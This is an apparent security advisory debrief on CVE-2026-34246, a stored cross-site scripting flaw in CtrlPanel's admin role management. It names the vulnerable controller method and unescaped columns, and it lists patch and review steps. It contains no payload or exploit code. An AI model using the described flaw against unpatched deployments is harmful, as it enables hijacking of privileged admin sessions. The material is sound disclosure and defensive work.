PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-34246 Ctrlpanel-gg CVE debrief

CVE-2026-34246 describes a stored cross-site scripting flaw in CtrlPanel’s admin role management interface. In affected versions, role name and color values are rendered into HTML without sanitization, and DataTables is instructed to treat the name column as raw HTML. That combination lets a user with role creation or edit permissions store malicious content that executes in other admins’ browsers when they open the roles page. The issue is fixed in CtrlPanel 1.2.0.

Vendor
Ctrlpanel-gg
Product
panel
CVSS
MEDIUM 4.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-19
Original CVE updated
2026-05-20
Advisory published
2026-05-19
Advisory updated
2026-05-20

Who should care

Administrators and security teams running CtrlPanel 1.1.1 or earlier, especially environments where non-superadmin users can create or edit roles. This is most important for teams that rely on the /admin/roles interface and have multiple admins or delegated role-management permissions.

Technical summary

The vulnerability is a stored XSS in app/Http/Controllers/Admin/RoleController.php. The datatable() method interpolates $role->name and $role->color directly into a <span> element’s HTML and style attribute without sanitization, and rawColumns(['actions', 'name']) disables escaping for the name column. A malicious role value can therefore be persisted to the database and rendered as executable HTML/JavaScript in the browser of any admin who loads /admin/roles. The supplied CVE record and GitHub advisory references indicate the issue is resolved in version 1.2.0.

Defensive priority

High for affected deployments. Although the CVSS score is Medium, the bug is stored, admin-facing, and persistent, so successful exploitation can compromise privileged sessions and trigger repeated execution until the malicious record is removed.

Recommended defensive actions

  • Upgrade CtrlPanel to version 1.2.0 or later.
  • Review any existing role names and color values for unexpected HTML, script, or event-handler content.
  • Restrict role creation and edit permissions to the minimum set of trusted administrators.
  • Verify that server-side output escaping is applied in the admin roles table, especially for any value inserted into HTML attributes or raw DataTables columns.
  • If compromise is suspected, force admin session rotation and inspect recent role-management changes.
  • Use the official GitHub advisory and release notes to confirm remediation steps for your deployment.

Evidence notes

The supplied CVE description states that versions 1.1.1 and prior are affected and that 1.2.0 resolves the issue. The NVD source metadata lists CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N and CWE-80/CWE-116. References in the source corpus point to the upstream GitHub security advisory and the 1.2.0 release tag. The CVE record was published on 2026-05-19 and later modified on 2026-05-20, which is the correct timing context for this debrief.

Official resources

Public disclosure is reflected in the CVE/NVD record dated 2026-05-19, with upstream GitHub advisory and release references pointing to the fix in CtrlPanel 1.2.0.